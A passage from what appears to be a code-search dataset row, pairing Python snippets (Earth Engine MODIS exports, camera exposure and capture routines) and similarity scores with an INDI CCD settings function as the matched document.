time_d[timeStep]+'_MOD13Q1_'+str(met)+'_'+str(years[0])+'_'+str(years[len(years)-1])+'_ptsB',\n folder = folderOut,\n fileFormat = 'CSV')\n task_tc.start()\n \n \n #print ('buffered pts by:' + str(buf) + ' for: ' + met)\n\n elif poly > 0:\n \n def table_m(image):\n table = (image\n .select(metL[0])\n .reduceRegions(collection = pts1.select([ID_field]),\n reducer = ee.Reducer.mean(),\n scale = scalePix))\n \n def table_add_date(f):\n return f.set('startDate', ee.Date(image.get('system:time_start')))\n\n return table.map(table_add_date)\n\n triplets = img_col.map(table_m).flatten()\n\n task_tc = ee.batch.Export.table.toDrive(collection = triplets\n .filter(ee.Filter.neq('mean', None))\n .select(['.*'],None,False),\n description = time_d[timeStep]+'_MOD13Q1_'+str(met)+'_'+str(years[0])+'_'+str(years[len(years)-1])+'_poly1',\n folder = folderOut,\n fileFormat = 'CSV')\n task_tc.start()\n \n \n #print ('spatial mean in poly: no buffer for: ' + met)\n\n else:\n def table_m(image):\n table = (image\n .select(metL[0])\n .reduceRegions(collection = pts1.select([ID_field]),\n reducer = ee.Reducer.mean(),\n scale = scalePix))\n \n def table_add_date(f):\n return f.set('startDate', ee.Date(image.get('system:time_start')))\n\n return table.map(table_add_date)\n\n triplets = img_col.map(table_m).flatten()\n\n task_tc = ee.batch.Export.table.toDrive(collection = triplets\n .filter(ee.Filter.neq('mean', None))\n .select(['.*'],None,False),\n description = time_d[timeStep]+'_MOD13Q1_'+str(met)+'_'+str(years[0])+'_'+str(years[len(years)-1])+'_pts1',\n folder = folderOut,\n fileFormat = 'CSV')\n task_tc.start()\n \n #print('value at point: no buffer for: ' + met)", "def autoExposure(this, **kargs):\n\t\t\n\t\t# Arguments\n\t\tframes = kargs.get('frames', 4)\n\t\tstart = kargs.get('start', -10)\n\t\tend = kargs.get('start', -3)\n\t\t\n\t\tmax = 0\n\t\tv = start\n\t\tprint 'Auto Exposition starting...'\n\t\t\n\t\tfor i in range(start, end):\n\t\t\tthis.setProp('exposure', i)\n\t\t\tfor j in range(frames): this.getFrame()\n\t\t\t\n\t\t\te = imEntropy(this.frame)\n\t\t\tif e > max:\n\t\t\t\tmax = e\n\t\t\t\tv = i\n\t\t\n\t\tthis.setProp('exposure', v)\n\t\tfor j in range(frames): this.getFrame()\n\t\tprint 'Exposure Calibrated: %i / Entropy: %.4f' % (v, max)", "def send_image_frame_REP_watcher(self, text, image):\n\n self.REQ_sent_time.append(datetime.utcnow()) # utcnow 2x faster than now\n try:\n hub_reply = self.sender.send_image(text, image)\n except: # add more specific exception, e.g. ZMQError, after testing\n print(\"Exception at sender.send_image in REP_watcher function.\")\n self. fix_comm_link()\n self.REP_recd_time.append(datetime.utcnow())\n return hub_reply", "def extract_hrc_evt2(obsid):\n#\n#--- write required arc4gl command\n#\n line = 'operation=retrieve\\n'\n line = line + 'dataset=flight\\n'\n line = line + 'detector=hrc\\n'\n line = line + 'level=2\\n'\n line = line + 'filetype=evt2\\n'\n line = line + 'obsid=' + str(obsid) + '\\n'\n line = line + 'go\\n'\n f = open(zspace, 'w')\n f.write(line)\n f.close()\n\n cmd1 = \"/usr/bin/env PERL5LIB=\"\n cmd2 = ' echo ' + hakama + ' |arc4gl -U' + dare + ' -Sarcocc -i' + zspace\n cmd = cmd1 + cmd2\n\n#\n#--- run arc4gl\n#\n bash(cmd, env=ascdsenv)\n mcf.rm_file(zspace)\n#\n#--- check the data is actually extracted\n#\n cmd = 'ls *'+ str(obsid) + '*evt2.fits.gz >' + zspace\n os.system(cmd)\n f = open(zspace, 'r')\n data = [line.strip() for line in f.readlines()]\n f.close()\n mcf.rm_file(zspace)\n\n if len(data) > 0:\n os.system('gzip -d *.gz')\n file = data[0]\n file = file.replace('.gz', '')\n return file\n else:\n return 'na'", "def stopcam_expose():\n\n\trespond = send_command('stopcam')", "def redo(self, channel, image):\n pass", "def GEEetMODIS(ptsFile,metric,timeStep,buf,poly,QC,username,folderOut, scalePix = 1000, startYear = None, endYear = None):\n \n # load required libraries\n import ee\n import math\n \n # Initialize the Earth Engine object, using the authentication credentials.\n ee.Initialize()\n\n ID_field = \"geeID\"\n\n #load pts or poly file\n pts1 = ee.FeatureCollection('users/' + username + '/' + str(ptsFile))\n \n #Computes the bits we need to extract.\n def getQABits(image, start, end, newName):\n pattern = 0\n listB = list(range(start, end+1))\n for one in listB:\n pattern += math.pow(2, one)\n pattern = int(pattern)\n \n return (image.select([0], [newName])\n .bitwiseAnd(pattern)\n .rightShift(start))\n\n time_d = {}\n time_d['lowest'] = 'rl'\n time_d['month'] = 'rm'\n time_d['year'] = 'ry'\n \n for met in metric:\n modisET = ee.ImageCollection('MODIS/006/MOD16A2')\n metL = [met]\n \n def maskbyBits1(img):\n QA = img.select('ET_QC')\n QA1 = getQABits(QA, 0, 0, 'QA')\n QA2 = getQABits(QA, 2, 2, 'QA')\n QA3 = getQABits(QA, 3, 4, 'QA')\n QA4 = getQABits(QA, 5, 7, 'QA')\n mask = QA1.eq(0).And(QA2.eq(0)).And(QA3.eq(0)).And(QA4.lt(4))\n return img.updateMask(mask)\n\n if QC == 'None':\n modisETn = modisET\n elif QC == 'Op1':\n modisETn = modisET.map(maskbyBits1)\n #modify so that divT gets calculated as 8, if date < 12/26\n #and gets a value of either 5 or 6 accordingly if >\n #also update start and end year\n def scale1(img):\n \n daysT = ee.Number(ee.Date(img.date().get('year').format().cat('-12-31')).getRelative('day','year')).add(1)\n divT = daysT.subtract(img.date().getRelative('day','year')).min(8)\n \n return (img.select(metL[0])\n .float()\n .multiply(0.1)\n .divide(divT)\n .copyProperties(img,['system:time_start','system:time_end']))\n \n modisETm = modisETn.map(scale1)\n \n lastImage = ee.Image(ee.ImageCollection('MODIS/006/MOD16A2')\n .sort('system:time_start',False)\n .first())\n lastImageDate = lastImage.get('system:index').getInfo()\n\n firstImage = ee.Image(ee.ImageCollection('MODIS/006/MOD16A2')\n .sort('system:time_start',True)\n .first())\n firstImageDate = firstImage.get('system:index').getInfo()\n\n if all([startYear is None,endYear is None]):\n startYear = int(firstImageDate[0:4])\n endYear = int(lastImageDate[0:4])\n startMonth = int(firstImageDate[5:7])\n endMonth = int(lastImageDate[5:7])-1\n startYearAll = startYear + 1\n endYearAll = endYear - 1\n\n years = list(range(startYear, endYearAll + 1))\n monthsEE = ee.List(list(range(startMonth,(12*len(years)+endMonth))))\n yearsEE = ee.List(list(range(startYearAll, endYearAll + 1)))\n \n elif all([startYear >= 0,endYear >= 0]):\n startYearReal = int(firstImageDate[0:4])\n endYearReal = int(lastImageDate[0:4]) \n \n years = list(range(max(startYearReal,startYear), (min(endYearReal,endYear) + 1)))\n \n if endYear >= endYearReal:\n endMonth = int(lastImageDate[5:7])-1\n endYearReal2 = endYearReal-1\n years2 = len(years)-1\n elif endYear < endYearReal:\n endMonth = 0\n endYearReal2 = endYearReal\n years2 = len(years)\n \n if startYear <= startYearReal:\n startMonth = int(firstImageDate[5:7])\n startYearReal2 = startYearReal+1\n elif startYear > startYearReal:\n startMonth = 0\n startYearReal2 = startYearReal\n \n monthsEE = ee.List(list(range(startMonth,(12*years2+endMonth))))\n yearsEE = ee.List(list(range(max(startYearReal2,startYear), (min(endYearReal2,endYear) + 1))))\n\n if timeStep == 'year':\n\n def map_m(i):\n i = ee.Number(i).int()\n image2 = (modisETm\n .filter(ee.Filter.calendarRange(i, i, 'year'))\n .first())\n filtered = (modisETm\n .filter(ee.Filter.calendarRange(i, i, 'year'))\n .mean()\n .copyProperties(image2,['system:time_start','system:time_end']))\n return filtered\n\n img_col = ee.ImageCollection(yearsEE.map(map_m).flatten())\n\n elif timeStep == 'month':\n \n def map_m(i):\n i = ee.Number(i)\n y = i.divide(12).add(years[0]).int()\n m = i.mod(12).add(1)\n image2 = (modisETm\n .filter(ee.Filter.calendarRange(m, m, 'month'))\n .filter(ee.Filter.calendarRange(y, y, 'year'))\n .first())\n filtered = (modisETm\n .filter(ee.Filter.calendarRange(m, m, 'month'))\n .filter(ee.Filter.calendarRange(y, y, 'year'))\n .mean()\n .copyProperties(image2,['system:time_start','system:time_end']))\n return filtered\n\n img_col = ee.ImageCollection(monthsEE.map(map_m).flatten())\n\n elif all([timeStep == 'lowest',endYear is None, startYear is None]):\n\n img_col = modisETm\n \n elif all([timeStep == 'lowest',endYear > 0, startYear > 0]):\n\n img_col = modisETm.filter(ee.Filter.calendarRange(startYear, endYear, 'year'))\n\n #else:\n # print(\"incorrect time step specified\")\n \n if buf > 0:\n bufL = [buf]\n def bufferPoly(feature):\n return feature.buffer(bufL[0])\n\n ptsB = pts1.map(bufferPoly)\n def table_m(image):\n table = (image\n .select(metL[0])\n .reduceRegions(collection = ptsB.select([ID_field]),\n reducer = ee.Reducer.mean(),\n scale = scalePix))\n \n def table_add_date(f):\n return f.set('startDate', ee.Date(image.get('system:time_start')))\n\n return table.map(table_add_date)\n\n triplets = img_col.map(table_m).flatten()\n\n task_tc = ee.batch.Export.table.toDrive(collection = triplets\n .filter(ee.Filter.neq('mean', None))\n .select(['.*'],None,False),\n description = time_d[timeStep]+'_MOD16A2_'+str(met)+'_'+str(years[0])+'_'+str(years[len(years)-1])+'_ptsB',\n folder = folderOut,\n fileFormat = 'CSV')\n task_tc.start()\n \n \n #print ('buffered pts by:' + str(buf) + ' for: ' + met)\n\n elif poly > 0:\n \n def table_m(image):\n table = (image\n .select(metL[0])\n .reduceRegions(collection = pts1.select([ID_field]),\n reducer = ee.Reducer.mean(),\n scale = scalePix))\n \n def table_add_date(f):\n return f.set('startDate', ee.Date(image.get('system:time_start')))\n\n return table.map(table_add_date)\n\n triplets = img_col.map(table_m).flatten()\n\n task_tc = ee.batch.Export.table.toDrive(collection = triplets\n .filter(ee.Filter.neq('mean', None))\n .select(['.*'],None,False),\n description = time_d[timeStep]+'_MOD16A2_'+str(met)+'_'+str(years[0])+'_'+str(years[len(years)-1])+'_poly1',\n folder = folderOut,\n fileFormat = 'CSV')\n task_tc.start()\n \n \n #print ('spatial mean in poly: no buffer for: ' + met)\n\n else:\n def table_m(image):\n table = (image\n .select(metL[0])\n .reduceRegions(collection = pts1.select([ID_field]),\n reducer = ee.Reducer.mean(),\n scale = scalePix))\n \n def table_add_date(f):\n return f.set('startDate', ee.Date(image.get('system:time_start')))\n\n return table.map(table_add_date)\n\n triplets = img_col.map(table_m).flatten()\n\n task_tc = ee.batch.Export.table.toDrive(collection = triplets\n .filter(ee.Filter.neq('mean', None))\n .select(['.*'],None,False),\n description = time_d[timeStep]+'_MOD16A2_'+str(met)+'_'+str(years[0])+'_'+str(years[len(years)-1])+'_pts1',\n folder = folderOut,\n fileFormat = 'CSV')\n task_tc.start()\n \n #print('value at point: no buffer for: ' + met)", "def testSendVideoProtuneExposure(self):\n self.mgr.sendGoProRequest = Mock()\n self.v.message_factory.gopro_set_request_encode.return_value = 3\n self.mgr.sendGoProCommand(mavutil.mavlink.GOPRO_COMMAND_PROTUNE_EXPOSURE, (1, 0, 0, 0))\n\n self.v.message_factory.gopro_set_request_encode.assert_called_with(0, mavutil.mavlink.MAV_COMP_ID_GIMBAL,\n mavutil.mavlink.GOPRO_COMMAND_PROTUNE_EXPOSURE, (1, 0, 0, 0))\n self.mgr.queueMsg.assert_called_with(3)\n self.mgr.sendGoProRequest.assert_called_with(mavutil.mavlink.GOPRO_COMMAND_PROTUNE_EXPOSURE)", "def capture(self):\n\n self.dpar.n_caps += 1\n self.dpar.caps_saved = False\n self.cap_screen.cap_loaded = True\n tstamp = datetime.now()\n\n self.dpar.cur_cap = self.dpar.n_caps\n self.dpar.iwindow.append(list(self.dpar.iwindow[0])) # deep copy\n self.dpar.frame_timestamp.append(tstamp)\n\n self.cap_scrollbar.setRange(1, self.dpar.n_caps)\n self.cap_scrollbar.setValue(self.dpar.n_caps)\n\n if self.config.sound_on_capture:\n QtMultimedia.QSound.play(CAMERA_CLICK_FILE)\n\n # Always write to file (3/2018)\n \"\"\"\n Write the capture to a file. Create the daily capture directory if not yet created.\n \"\"\"\n\n #im = Image.fromarray(d, mode='F') # float32\n #im.save(\"test2.tiff\", \"TIFF\")\n # https://gist.github.com/ax3l/5781ce80b19d7df3f549#pillow\n\n \"\"\"\n Note that despite lack of documenation, this does save as 16-bit gray-scale image. Open in Photoshop to\n confirm. Irfan converts to 8 bpp upon opening ans scales pixels\n \"\"\"\n cfn = self._get_cap_filename()\n cap_image = np.copy(self.dpar.latest_frame).astype(np.uint16)\n im = PIL.Image.fromarray((cap_image << (16 - self.camera.pixel_bits)).astype(np.uint16))\n im.save(cfn, 'TIFF')\n\n \"\"\" \n cap_image = np.copy(self.dpar.latest_frame).astype(np.uint16)\n cv2.imwrite(cfn, (cap_image << (16 - self.camera.pixel_bits)).astype(np.uint16))\n \"\"\"\n\n et = np.int(np.round(self.camera.actual_exposure_time_ms))\n fn = os.path.basename(cfn)\n\n self.write_to_log('%d\\t%s' % (et, fn))\n\n self.swap_button.setEnabled(True)\n self.update_cap_image()", "def exposuretime(self):\n _, = self.exposuretimes\n return _", "def fetchImgEXP(SYS, DEV):\n SYSDEV = str(SYS) + \"{\" + str(DEV) + \"}\"\n data = caget(SYSDEV + \"image1:ArrayData\")\n rows = caget(SYSDEV + \"image1:ArraySize1_RBV\")\n cols = caget(SYSDEV + \"image1:ArraySize0_RBV\")\n dtype = caget(SYSDEV + \"cam1:DataType_RBV\")\n color = caget(SYSDEV + \"cam1:ColorMode_RBV\")\n count = 0\n img = []\n row = []\n dtype = EPICSTYPE[caget(SYSDEV + \"cam1:DataType_RBV\")]\n #print dtype\n color = caget(SYSDEV + \"cam1:ColorMode_RBV\")\n #print color\n for i in range(rows):\n for j in range(cols):\n row.append(data[count])\n count = count + 1\n r = np.array(row, dtype)\n img.append(r)\n row = []\n npra = np.array(img, dtype)\n #display(npra)\n save(npra, \"fetchImg.jpg\")\n save(npra, \"fetchImg.tiff\") # Might need to change file type\n save(npra, \"fetchImg.jp2\") # Might need to change file type\n save(npra, \"fetchImg.png\") # Might need to change file type\n img = load(\"fetchImg.jpg\") #, getColorFlag(color))\n return img", "def autoExpose(camera,\r\n target_level=245,\r\n adjust_shutter=True,\r\n adjust_gain=True):\r\n\r\n if target_level <= 0 or target_level >= 255:\r\n raise ValueError(\"Target level must be value between in the range\"\r\n \"]0,255[ !\")\r\n\r\n # There must be something to adjust\r\n if ~adjust_shutter and ~adjust_gain:\r\n raise ValueError(\"At one of the variables must be adjustable!\")\r\n\r\n while True:\r\n # Grab frame\r\n image = camera.retrieveBuffer()\r\n image = image.convert(PyCapture2.PIXEL_FORMAT.RAW8)\r\n data = image.getData()\r\n\r\n # Grab current camera properties\r\n shutter = camera.getProperty(PyCapture2.PROPERTY_TYPE.SHUTTER).absValue\r\n gain = camera.getProperty(PyCapture2.PROPERTY_TYPE.GAIN).absValue\r\n\r\n # Exposition adjustment\r\n max_val = np.max(data)\r\n print(\"Shutter = {0:.2f}[ms], Gain = {1:.1f}[db],\"\r\n \"Max pixel value = {2:d} \".format(shutter, gain, max_val),\r\n end='\\r')\r\n\r\n if max_val == max:\r\n if gain == 0 or ~adjust_shutter:\r\n if shutter > 0.1:\r\n shutter = max(0.1, shutter * (1 + _dShutter))\r\n else:\r\n gain = max(0, gain - _dGain)\r\n\r\n elif max_val < min:\r\n if shutter < 8:\r\n shutter = min(8.1, shutter / (1 + _dShutter))\r\n else:\r\n gain += _dGain\r\n else:\r\n break\r\n\r\n # Update camera parameters\r\n if autoExpose:\r\n camera.setProperty(type=PyCapture2.PROPERTY_TYPE.SHUTTER,\r\n autoManualMode=False, absValue=shutter)\r\n camera.setProperty(type=PyCapture2.PROPERTY_TYPE.GAIN,\r\n autoManualMode=False, absValue=gain)", "def capture(camera, image):\n iss.compute() # Get the lat/long values from ephem\n\n # convert the latitude and longitude to EXIF-appropriate representations\n south, exif_latitude = convert(iss.sublat)\n west, exif_longitude = convert(iss.sublong)\n\n # set the EXIF tags specifying the current location\n camera.exif_tags['GPS.GPSLatitude'] = exif_latitude\n camera.exif_tags['GPS.GPSLatitudeRef'] = \"S\" if south else \"N\"\n camera.exif_tags['GPS.GPSLongitude'] = exif_longitude\n camera.exif_tags['GPS.GPSLongitudeRef'] = \"W\" if west else \"E\"\n\n # capture the image to disk\n camera.capture(image)", "def expose(self, dark=False, blocking=True):\n with self.lock:\n status = self.status\n if status != READY:\n raise FliError(\"Camera not ready, abort expose command\")\n with self.lock:\n self.dark = dark\n self.tstart = time.time()\n self.timestamp = time.strftime(\"%Y-%m-%dT%H:%M:%S\", time.localtime(self.tstart))\n self.status = EXPOSING\n\n thr = threading.Thread(target=self.exposeHandler)\n thr.start()\n if blocking:\n thr.join()", "def command(mode, ip, log):\n logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging_config[log])\n\n # Using the default dict to get a valid format string no matter what\n phantom_socket = PhantomSocket(ip)\n phantom_socket.connect()\n click.echo('CONNECTED TO THE PHANTOM CAMERA')\n\n mode_identifier = _modes[mode]\n phantom_socket.set_mode(mode_identifier)\n click.echo('PHANTOM WILL TRANSIT INTO THE MODE \"%s\" NOW!' % mode_identifier)\n click.echo('THIS WILL CAUSE A REBOOT OF THE CAMERA, SO PLEASE HAVE PATIENCE')\n click.echo('IN CASE A CONNECTION CANNOT BE ESTABLISHED EVEN AFTER SOME TIME, HARD RESET THE CAMERA')\n click.echo('AFTER THE HARD RESET, THE MODE SHOULD BE CHANGED')\n phantom_socket.disconnect()", "def locate_camera_frame(self, exp_id, left_cam_id, right_cam_id, frame_id):\n return Response(self.gen_locate_camera_frame(exp_id,\n left_cam_id, right_cam_id,\n frame_id),\n mimetype='multipart/x-mixed-replace; boundary=frame')", "def process_frame(self, downsize):\n # if (not hasattr(downsize,'shape')) and (not hasattr(downsize,'len')):\n # downsize = np.array(downsize)\n\n if type(downsize) != np.ndarray:\n raise TypeError\n\n if not downsize.any():\n raise ValueError\n\n if self.pre_resize:\n downsize = cv2.resize(downsize, (0, 0), fx=self.resize_factor, fy=self.resize_factor)\n\n self.frame_history.append(downsize)\n\n # Remove no longer needed frames from memory\n self.frame_history = self.frame_history[-(self.LMC_rec_depth):]\n downsize = signal.lfilter(self.b, self.a, self.frame_history, axis=0)[-1]\n\n # Center surround antagonism kernel applied.\n\n downsize = cv2.filter2D(downsize, -1, self.CSKernel)\n\n # RTC filter.\n u_pos = deepcopy(downsize)\n u_neg = deepcopy(downsize)\n u_pos[u_pos < 0] = 0\n u_neg[u_neg > 0] = 0\n u_neg = -u_neg\n\n # On first step, instead of computing just save the images.\n if self.t == self.T0:\n self.v_pos_prev = deepcopy(u_pos)\n self.v_neg_prev = deepcopy(u_neg)\n self.u_pos_prev = deepcopy(u_pos)\n self.u_neg_prev = deepcopy(u_neg)\n\n # Do everything for pos == ON.\n tau_pos = u_pos - self.u_pos_prev\n tau_pos[tau_pos >= 0] = 0.001\n tau_pos[tau_pos < 0] = 0.1\n mult_pos = self.rtc_exp(self.dt, tau_pos)\n v_pos = -(mult_pos - 1) * u_pos + mult_pos * self.v_pos_prev\n self.v_pos_prev = deepcopy(v_pos)\n\n # Do everything for neg == OFF.\n tau_neg = u_neg - self.u_neg_prev\n tau_neg[tau_neg >= 0] = 0.001\n tau_neg[tau_neg < 0] = 0.1\n mult_neg = self.rtc_exp(self.dt, tau_neg)\n v_neg = -(mult_neg - 1) * u_neg + mult_neg * self.v_neg_prev\n self.v_neg_prev = deepcopy(v_neg)\n\n # keep track of previous u.\n self.u_pos_prev = deepcopy(u_pos)\n self.u_neg_prev = deepcopy(u_neg)\n\n # Subtract v from u to give the output of each channel.\n out_pos = u_pos - v_pos\n out_neg = u_neg - v_neg\n\n # Now apply yet another filter to both parts.\n out_pos = cv2.filter2D(out_pos, -1, self.H_filter)\n out_neg = cv2.filter2D(out_neg, -1, self.H_filter)\n out_pos[out_pos < 0] = 0\n out_neg[out_neg < 0] = 0\n\n if self.t == self.T0:\n self.out_neg_prev = deepcopy(out_neg)\n\n # Delay off channel.\n out_neg = signal.lfilter(self.b1, self.a1, [self.out_neg_prev, out_neg], axis=0)[-1]\n self.out_neg_prev = out_neg\n downsize = out_neg * out_pos\n\n # Show image.\n downsize *= self.gain\n downsize = np.tanh(downsize)\n\n # Threshold.\n downsize[downsize < self.threshold] = 0\n\n if not self.pre_resize:\n downsize = cv2.resize(downsize, (0, 0), fx=self.resize_factor, fy=self.resize_factor)\n\n self.t += self.dt\n\n return downsize", "def send(self):\n self.spi.send(self.startframe + self.buffer)", "def get_cxi_pattern_eventtime(exp_line, exp_name, user_name, process_stage, run_num):\n # Construct the file address of the corresponding cxi file\n file_name = get_cxi_file_position(exp_line=exp_line,\n exp_name=exp_name,\n process_stage=process_stage,\n user_name=user_name,\n run_num=run_num)\n # Get event index energy\n with h5.File(file_name, 'r') as h5file:\n machinetime = np.array(h5file['/LCLS/machineTime'], dtype=np.int64)\n machinetimenanoseconds = np.array(h5file['/LCLS/machineTimeNanoSeconds'], dtype=np.int64)\n\n return machinetime * (10 ** 9) + machinetimenanoseconds", "def _send(self, frame):\n \n self.device.write(frame)" ]
[ "0.66172343", "0.66024214", "0.61997694", "0.6147396", "0.6001152", "0.5911744", "0.5895627", "0.5890128", "0.5692038", "0.5651894", "0.5623061", "0.56096864", "0.54805845", "0.54146963", "0.5291824", "0.5205684", "0.5177268", "0.51427567", "0.51357037", "0.5105987", "0.5099826", "0.50125957", "0.49856898", "0.49391565", "0.49388713", "0.4927951", "0.49048397", "0.48570973", "0.4849138", "0.48462513", "0.48154885", "0.48036775", "0.47916815", "0.4757237", "0.4718548", "0.46946597", "0.46945262", "0.4690798", "0.46706316", "0.46381631", "0.46298072", "0.45866695", "0.4570952", "0.45507437", "0.45307025", "0.45285425", "0.45227996", "0.45139012", "0.45114103", "0.45050785", "0.4496643", "0.44894615", "0.44887525", "0.4486777", "0.44765708", "0.44618407", "0.443816", "0.44318885", "0.44273552", "0.44111177", "0.44075513", "0.43989918", "0.43939513", "0.43832126", "0.43435743", "0.43361315", "0.43351713", "0.43272412", "0.43158963", "0.4313634", "0.43113545", "0.43113545", "0.4297231", "0.42710093", "0.42659566", "0.4256123", "0.42508098", "0.42454377", "0.42449024", "0.42219236", "0.4220337", "0.42198804", "0.42182425", "0.4212204", "0.42006093", "0.4200132", "0.41995037", "0.4198649", "0.41967866", "0.41951194", "0.41931996", "0.41881016", "0.4180974", "0.41787052", "0.41774154", "0.41538984", "0.41476995", "0.4140007", "0.41386372", "0.41336417" ]
0.7639681
0
Changes CCD parameters/settings based on the given arguments
def setParams(commandList): for i in commandList: # set the bin mode (1x1 or 2x2) if 'bin=' in i: try: bin = int(i.replace('bin=','')) if bin >= 1 and bin <= 2: ccd_bin[0].value = bin ccd_bin[1].value = bin indiclient.sendNewNumber(ccd_bin) response = 'OK: Bin mode set to '+str(bin)+'x'+str(bin) else: response = 'BAD: Invalid Bin Mode' except ValueError: response = 'BAD: Invalid Bin Mode' # turn the cooler on/off elif 'cooler=' in i: cooler = i.replace('cooler=','') if cooler.lower() == 'on': ccd_cooler[0].s=PyIndi.ISS_ON # the "COOLER_ON" switch ccd_cooler[1].s=PyIndi.ISS_OFF # the "COOLER_OFF" switch indiclient.sendNewSwitch(ccd_cooler) response = 'OK: Cooler turned '+cooler elif cooler.lower() == 'off': ccd_cooler[0].s=PyIndi.ISS_OFF # the "COOLER_ON" switch ccd_cooler[1].s=PyIndi.ISS_ON # the "COOLER_OFF" switch indiclient.sendNewSwitch(ccd_cooler) response = 'OK: Cooler turned '+cooler else: response = 'BAD: Invalid cooler set' # set the temperature setpoint (-40C - 0C) elif 'temp=' in i: try: temp = float(i.replace('temp=','')) if temp >= -40 and temp <= 0: response = 'OK: Setting temperature setpoint to '+str(temp) ccd_temp[0].value = temp indiclient.sendNewNumber(ccd_temp) else: response = 'BAD: Invalid temperature setpoint' except ValueError: response = 'BAD: Invalid temperature setpoint' # set the image output directory elif 'fileDir=' in i: try: global imgNum global imgName global fileDir tempFileDir = i.replace('fileDir=','') if tempFileDir[0] == '~': tempFileDir = os.path.expanduser('~')+tempFileDir[1:] if tempFileDir[len(tempFileDir)-1] != '/': tempFileDir = tempFileDir+'/' if not os.path.exists(tempFileDir): os.makedirs(tempFileDir) imgNum, imgName = last_image(tempFileDir) fileDir = tempFileDir response = 'OK: File directory set to '+fileDir #run_image_display(fileDir) except FileNotFoundError: response = 'BAD: Directory does not exist' # set the temperature setpoint (-40C - 0C) elif 'frameType=' in i: try: frameType = i.replace('frameType=','') if frameType.lower() == 'light': ccd_frame[0].s = PyIndi.ISS_ON ccd_frame[1].s = PyIndi.ISS_OFF ccd_frame[2].s = PyIndi.ISS_OFF ccd_frame[3].s = PyIndi.ISS_OFF indiclient.sendNewSwitch(ccd_frame) response = 'OK: CCD frame type set to '+frameType elif frameType.lower() == 'bias': ccd_frame[0].s = PyIndi.ISS_OFF ccd_frame[1].s = PyIndi.ISS_ON ccd_frame[2].s = PyIndi.ISS_OFF ccd_frame[3].s = PyIndi.ISS_OFF indiclient.sendNewSwitch(ccd_frame) response = 'OK: CCD frame type set to '+frameType elif frameType.lower() == 'dark': ccd_frame[0].s = PyIndi.ISS_OFF ccd_frame[1].s = PyIndi.ISS_OFF ccd_frame[2].s = PyIndi.ISS_ON ccd_frame[3].s = PyIndi.ISS_OFF indiclient.sendNewSwitch(ccd_frame) response = 'OK: CCD frame type set to '+frameType elif frameType.lower() == 'flat': ccd_frame[0].s = PyIndi.ISS_OFF ccd_frame[1].s = PyIndi.ISS_OFF ccd_frame[2].s = PyIndi.ISS_OFF ccd_frame[3].s = PyIndi.ISS_ON indiclient.sendNewSwitch(ccd_frame) response = 'OK: CCD frame type set to '+frameType else: response = 'BAD: Invalid frame type' except ValueError: response = 'BAD: Invalid frame type' else: response = 'BAD: Invalid Set'+'\n'+response return response
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def setCcdMode(*argv):", "def set_parameter_values(self, c1, c2):\n self.c1 = c1\n self.c2 = c2", "def set_parameters(self, args):\n self.args = args\n\n if args.testing:\n self.delay_close()\n\n if args.source == \"simulation\":\n log.info(\"Create simulated spectra device\")\n self.dev = simulation.SimulatedSpectraDevice()\n\n elif args.source == \"sled\":\n log.info(\"Create single sled cobra\")\n self.dev = simulation.SimulatedCobraSLED()\n\n elif args.source == \"cobra\":\n log.info(\"Create DALSA cobra device\")\n #self.dev = devices.DalsaCobraDevice()\n self.dev = DALSA.Cobra()\n\n elif args.source == \"opto\":\n log.info(\"Create OPTO sensor cobra device\")\n self.dev = DALSA.OPTOCobra()\n\n elif args.source == \"basler\":\n log.info(\"Create DALSA basler device\")\n #self.dev = devices.DalsaBaslerDevice()\n self.dev = DALSA.BaslerSprint4K()\n\n self.dev.setup_pipe()\n self.setup_pipe_timer()", "def run(fips_dir, proj_dir, args) :\n if len(args) > 0 :\n noun = args[0]\n if noun == 'config' :\n if len(args) > 1 :\n cfg_name = args[1]\n settings.set(proj_dir, 'config', cfg_name)\n else :\n log.error('expected config name')\n elif noun == 'target' :\n if len(args) > 1 :\n target_name = args[1]\n settings.set(proj_dir, 'target', target_name)\n else :\n log.error('expected target name')\n elif noun == 'jobs' :\n if len(args) > 1 :\n num_jobs = args[1]\n if num_jobs.isdigit() :\n settings.set(proj_dir, 'jobs', int(num_jobs))\n else :\n log.error(\"value for setting 'jobs' must be a number\")\n else :\n log.error('expected number of build jobs value')\n elif noun == 'ccache' :\n if len(args) > 1 :\n use_ccache = args[1]\n if use_ccache == 'on' :\n settings.set(proj_dir, 'ccache', True)\n elif use_ccache == 'off' :\n settings.set(proj_dir, 'ccache', False)\n else :\n log.error(\"value for setting 'ccache' must be 'on' or 'off\")\n else :\n log.error(\"invalid noun '{}', must be 'config' or 'target'\".format(noun))\n else :\n log.error(\"expected noun 'config' or 'target'\")", "def _set_command_line_parameters(self,data):\n # This function could be cleaned up.\n\n # for each command line parameter, set it to the value passed in or\n # the default value.\n for p in self._parameter_order:\n if p not in data:\n if p in self._required_parameters: \n raise ApplicationError,\\\n \"Required parameter %s missing.\" % p\n else: data[p] = self._data[p]\n # Write necessary files to disk -- need to modify this so paths\n # to existing files can be passed in.\n if p in self._potential_paths:\n try:\n data[p] = self._input_as_lines(data[p])\n except TypeError:\n pass\n if data['single_pair_only'] == 1 and \\\n not (data['pos1'] and data['pos2']):\n raise ApplicationError,\\\n \"Must specify pos1 and pos2 if single_pair_only == 1.\"\n\n # Make sure the MolType is in the correct format (i.e., 1 or 0)\n data['mol_type'] = mol_type = \\\n self._mol_type_lookup[str(data['mol_type']).lower()]\n\n char_order = self._char_order[mol_type]\n # If we didn't get several values as parameters, set the defaults. \n # These are done outside of the above loop b/c they require special \n # handling.\n if not data['char_priors']: \n data['char_priors'] = self._default_priors[mol_type]\n data['char_priors'] = \\\n self._input_as_lines(\\\n self._input_as_gctmpca_char_priors(\\\n data['char_priors'],char_order))\n if not data['sub_matrix']: \n data['sub_matrix'] = \\\n self._input_as_multiline_string(\\\n self._default_sub_matrix[mol_type])\n else:\n data['sub_matrix'] = \\\n self._input_as_lines(\\\n self._input_as_gctmpca_rate_matrix(\\\n data['sub_matrix'],char_order))\n if not data['output_path']: \n data['output_path'] = \\\n self._input_as_path(self.getTmpFilename())\n return data", "def configure(self, args):\n pass", "def apply_args(self):\n\n args = self.args\n\n Test.compile_only = args.compile_only\n Test.skip_comparison = args.skip_comparison\n Test.global_tolerance = args.tolerance\n Test.global_abs_tolerance = args.abs_tolerance\n Test.global_particle_tolerance = args.particle_tolerance\n Test.performance_params = args.check_performance", "def do_config(self, args):\n if args.set == \"store_password\":\n put_config_value(\"store_password\", True if args.value.lower() == \"yes\" else False)\n elif 